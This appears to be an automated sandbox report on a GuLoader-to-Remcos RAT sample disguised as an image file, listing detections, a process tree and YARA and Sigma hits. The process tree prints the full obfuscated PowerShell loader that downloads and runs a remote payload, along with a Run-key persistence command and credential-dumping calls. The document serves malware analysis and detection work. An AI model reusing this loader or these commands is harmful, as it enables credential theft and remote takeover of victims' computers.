
Windows Analysis Report
rIMG465244247443GULFORDEROpmagasinering.cmd

Overview

General Information

Sample name: rIMG465244247443GULFORDEROpmagasinering.cmd
Analysis ID: 1538407
MD5: d4a5745ec008932bec834b981d31bd8f
SHA1: c57e44498a52b6aa60e55c19a16cb026104fa19c
SHA256: 40b46bae5cca53c55f7b7f941b0a02aeb5ef5150d9eff7258c48f92de5435216
Tags: cmd, user-Porcupine

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6712 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rIMG465244247443GULFORDEROpmagasinering.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6852 cmdline: powershell.exe -windowstyle hidden " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. 
.hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbag t.ree.MorgwRealEA erbThencNbenL eomI pereAsteNSolbTSta ');Yderzoner ($exhaust);Yderzoner (Abkhasian 'Twil$ T aPWig aStrarHeteeGenenMlketT veh weeoBirkoskradS,lf. 
S rHUpbre araOmkrdUdfoeInter eesOutk[Hot $Em eG BreeContn,ossbS.gnrSpirusl dgIllieCratlTilbiSynagonom] D s=Frys$BaggSBiogt aaneo ernTusib S.mr traoIn ie Fo,rAna, ');$Ufejlbarlighed=Abkhasian ' P c$ adePUnguaGlorrKoloeChopnIndotGerahG nno esvoViv,dsyss.GadfD pr oTilbwLi,unhon,lCosto.lmuaH pod KvaFAenditradl.cceeInt ( T.v$Pan,BJomfrMar uCanctMut th.smoRefen ,auaTr ctE,teiOve,o TrinFucha orslCounpTerrra deoInned Jasu TrskBlgmtDyreeUsigr.ingnCicaeFdevsUnyt,Tilr$harpmRen.oR ddd AeoeBesir L,vmV,garThulk ytefeberNonssPseu)Gauf ';$modermrkers=$embusque;Yderzoner (Abkhasian ',nfr$.blaG SkoLFrsto V,kBCapmamiljlAppr: Fo CTy eI onacForsh Mata,ljlr Bel1Seng3Ber 9Palc=Unde( smitVinkEGunpS T fT,ese-MossPblyaabasitGrodHEpin Knur$ P.jMIndbOAfgrDSur EStjeRKodemForkRCamekSam ePersr oursNait)Cuad ');while (!$Cichar139) {Yderzoner (Abkhasian 'Coll$Se,sgNat.lBudgoEnogbStenaA ullNonm:neohC Repo RevrSte.vJambe E dn ers=K,mu$ HaatI.klr ampu.ulteSisi ') ;Yderzoner $Ufejlbarlighed;Yderzoner (Abkhasian ' ,oys epTta gaDmonrHelsTNump-Bn ksFjerLFri ENoncEJuleP Dia Hjbe4 ,an ');Yderzoner (Abkhasian 'E is$Be ag EneLSemiOLil,b Gr,ATilfl lev:Tra,c AggIUdskcPhe.HDemea CorRReco1 Mdd3 Cya9 Bes=Skru(RegiTFejleQuinsTa gT ,ap-DvrgpInapaA fiTBel HA,kv B oe$IchtMDefaOExo dUntheCow,R forMNontrS roKfsteewagerCombsBusk) St ') ;Yderzoner (Abkhasian 'Fing$ScinGOverl E,yo UraBCrepASynalExte:Dagbc verlAddeA .rosUmbisRuthfFrimeSt,pl ImmLT onO CoxWAgit=R.ru$S emGAnnul Deso .chbc,naaLocoL ,ou:Coext isiITranl pans digk DrudNondEMamaT Spe+Disp+Ere.% Spn$Brans ranT.lynu Le D EmbEEmbanHobet luse FrorSog BForrR.efadstudEKiddtSt r.glosCIantoSt iuSum,NIndrtSuk, ') ;$Bruttonationalprodukternes=$Studenterbrdet[$Classfellow];}$Stes=297654;$Overconsumption105=29597;Yderzoner (Abkhasian 'Rum,$tempgHttel iffO HypbDimiAAntiLNov.: eodP rusrQuanoKunoS Z,fEudgyc atTBrileLivsdKan, Te.t=Audi Fly gInsoEDagltMono-Exp.CTalio Tagn,ntitgnieEVrinNFeritOutg Syst$narkMHandO tykDP oceS,avRFlommEd.fRIodoKSt,nE BusRVareSSels ');Yderzoner 
(Abkhasian ' Kur$flyvg AmalBejeoSintbPla aKommlStra:Oms.V r tePorcl LetuDonexFore El,t= cal Te s[.lueSVidey nasHelot,sore odemArmo. ComCFng oCh fn.igtv oneo errAnt.tChri]Depo:Affl: SlaFOverrSupeoo,temProdB ixiaXylosSmelePjan6Misa4oxygS ErotHjderCeleiUdtrnTrung Fis(Dema$C sePLu,pr.ndeo PibsWinde,uslcH,lhtArrie m rdfabl)Spag ');Yderzoner (Abkhasian 'Rove$OrkeGHi slGento Strb FadANonelHerc:PentBBag.i BeeoAntif KonO ,ndGUrop Mid =T ls Rus[SkalsSymbYAwessU.deToryzeLuftMRe,i. SartHarleUndeXFraft Fas. Bu Eala,nEm iCN neO AfpdBortITubenDa nGSelv]Brne: Kul:Fejla O kSbefacPreoIDesmiBoks.AmorG.ekse Q aT BessA.sttIsocRHi rISpr NprecGE,ne(Anve$ indvK,lleCircL S.ruUpwiXabso)Isla ');Yderzoner (Abkhasian ' De $BarnGGodklRepuOPartbBybiaUndel Uar: CelsOmdbm FodMCongELi sNS.ndeBiki=Femd$AlbiB UfoI ooeo ndif Re o ,fggDelu.ZoomsB,tjuPatebTurfShemiTSid RSticirestnSantgDdeb( Ya,$NoncS C,rt AneeGesnsA,li,Apos$ B,sOMaskvstepePyroRS ric.rkpOOvernPaupS EthuFiskm Inhp P aT acrIFelloNominPaat1La.o0Ult.5Adul) Pro ');Yderzoner $Smmene;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 3272 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. 
.hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbag t.ree.MorgwRealEA erbThencNbenL eomI pereAsteNSolbTSta ');Yderzoner ($exhaust);Yderzoner (Abkhasian 'Twil$ T aPWig aStrarHeteeGenenMlketT veh weeoBirkoskradS,lf. 
S rHUpbre araOmkrdUdfoeInter eesOutk[Hot $Em eG BreeContn,ossbS.gnrSpirusl dgIllieCratlTilbiSynagonom] D s=Frys$BaggSBiogt aaneo ernTusib S.mr traoIn ie Fo,rAna, ');$Ufejlbarlighed=Abkhasian ' P c$ adePUnguaGlorrKoloeChopnIndotGerahG nno esvoViv,dsyss.GadfD pr oTilbwLi,unhon,lCosto.lmuaH pod KvaFAenditradl.cceeInt ( T.v$Pan,BJomfrMar uCanctMut th.smoRefen ,auaTr ctE,teiOve,o TrinFucha orslCounpTerrra deoInned Jasu TrskBlgmtDyreeUsigr.ingnCicaeFdevsUnyt,Tilr$harpmRen.oR ddd AeoeBesir L,vmV,garThulk ytefeberNonssPseu)Gauf ';$modermrkers=$embusque;Yderzoner (Abkhasian ',nfr$.blaG SkoLFrsto V,kBCapmamiljlAppr: Fo CTy eI onacForsh Mata,ljlr Bel1Seng3Ber 9Palc=Unde( smitVinkEGunpS T fT,ese-MossPblyaabasitGrodHEpin Knur$ P.jMIndbOAfgrDSur EStjeRKodemForkRCamekSam ePersr oursNait)Cuad ');while (!$Cichar139) {Yderzoner (Abkhasian 'Coll$Se,sgNat.lBudgoEnogbStenaA ullNonm:neohC Repo RevrSte.vJambe E dn ers=K,mu$ HaatI.klr ampu.ulteSisi ') ;Yderzoner $Ufejlbarlighed;Yderzoner (Abkhasian ' ,oys epTta gaDmonrHelsTNump-Bn ksFjerLFri ENoncEJuleP Dia Hjbe4 ,an ');Yderzoner (Abkhasian 'E is$Be ag EneLSemiOLil,b Gr,ATilfl lev:Tra,c AggIUdskcPhe.HDemea CorRReco1 Mdd3 Cya9 Bes=Skru(RegiTFejleQuinsTa gT ,ap-DvrgpInapaA fiTBel HA,kv B oe$IchtMDefaOExo dUntheCow,R forMNontrS roKfsteewagerCombsBusk) St ') ;Yderzoner (Abkhasian 'Fing$ScinGOverl E,yo UraBCrepASynalExte:Dagbc verlAddeA .rosUmbisRuthfFrimeSt,pl ImmLT onO CoxWAgit=R.ru$S emGAnnul Deso .chbc,naaLocoL ,ou:Coext isiITranl pans digk DrudNondEMamaT Spe+Disp+Ere.% Spn$Brans ranT.lynu Le D EmbEEmbanHobet luse FrorSog BForrR.efadstudEKiddtSt r.glosCIantoSt iuSum,NIndrtSuk, ') ;$Bruttonationalprodukternes=$Studenterbrdet[$Classfellow];}$Stes=297654;$Overconsumption105=29597;Yderzoner (Abkhasian 'Rum,$tempgHttel iffO HypbDimiAAntiLNov.: eodP rusrQuanoKunoS Z,fEudgyc atTBrileLivsdKan, Te.t=Audi Fly gInsoEDagltMono-Exp.CTalio Tagn,ntitgnieEVrinNFeritOutg Syst$narkMHandO tykDP oceS,avRFlommEd.fRIodoKSt,nE BusRVareSSels ');Yderzoner 
(Abkhasian ' Kur$flyvg AmalBejeoSintbPla aKommlStra:Oms.V r tePorcl LetuDonexFore El,t= cal Te s[.lueSVidey nasHelot,sore odemArmo. ComCFng oCh fn.igtv oneo errAnt.tChri]Depo:Affl: SlaFOverrSupeoo,temProdB ixiaXylosSmelePjan6Misa4oxygS ErotHjderCeleiUdtrnTrung Fis(Dema$C sePLu,pr.ndeo PibsWinde,uslcH,lhtArrie m rdfabl)Spag ');Yderzoner (Abkhasian 'Rove$OrkeGHi slGento Strb FadANonelHerc:PentBBag.i BeeoAntif KonO ,ndGUrop Mid =T ls Rus[SkalsSymbYAwessU.deToryzeLuftMRe,i. SartHarleUndeXFraft Fas. Bu Eala,nEm iCN neO AfpdBortITubenDa nGSelv]Brne: Kul:Fejla O kSbefacPreoIDesmiBoks.AmorG.ekse Q aT BessA.sttIsocRHi rISpr NprecGE,ne(Anve$ indvK,lleCircL S.ruUpwiXabso)Isla ');Yderzoner (Abkhasian ' De $BarnGGodklRepuOPartbBybiaUndel Uar: CelsOmdbm FodMCongELi sNS.ndeBiki=Femd$AlbiB UfoI ooeo ndif Re o ,fggDelu.ZoomsB,tjuPatebTurfShemiTSid RSticirestnSantgDdeb( Ya,$NoncS C,rt AneeGesnsA,li,Apos$ B,sOMaskvstepePyroRS ric.rkpOOvernPaupS EthuFiskm Inhp P aT acrIFelloNominPaat1La.o0Ult.5Adul) Pro ');Yderzoner $Smmene;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7104 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 7084 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 2596 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • msiexec.exe (PID: 7136 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\pvaqv" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5428 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sxfiolkk" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5220 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\crtbpevmxvde" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • wscript.exe (PID: 4324 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is XORed.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author | Strings
00000004.00000002.2002636954.0000000008EE0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000004.00000002.2002956756.000000000D545000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000004.00000002.1983290797.000000000606C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000002.00000002.1808977051.000001209006F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
Source | Rule | Description | Author | Strings
amsi64_6852.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_3272.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0xc43f:$b2: ::FromBase64String(
  • 0xb4a5:$s1: -join
  • 0x4c51:$s4: +=
  • 0x4d13:$s4: +=
  • 0x8f3a:$s4: +=
  • 0xb057:$s4: +=
  • 0xb341:$s4: +=
  • 0xb487:$s4: +=
  • 0x151c6:$s4: +=
  • 0x15246:$s4: +=
  • 0x1530c:$s4: +=
  • 0x1538c:$s4: +=
  • 0x15562:$s4: +=
  • 0x155e6:$s4: +=
  • 0xbcea:$e4: Get-WmiObject
  • 0xbed9:$e4: Get-Process
  • 0xbf31:$e4: Start-Process
  • 0x15e7b:$e4: Get-Process

System Summary

Source: Process started. Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems). Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7104, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , ProcessId: 4324, ProcessName: wscript.exe
Source: Process started. Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton. Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7104, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , ProcessId: 4324, ProcessName: wscript.exe
Source: Process started. Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community. Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7104, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs" , ProcessId: 4324, ProcessName: wscript.exe
Source: Registry Key set. Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split). Data: Details: %Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Gummicheckene
Source: Process started. Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community. Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7084, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)", ProcessId: 2596, ProcessName: reg.exe
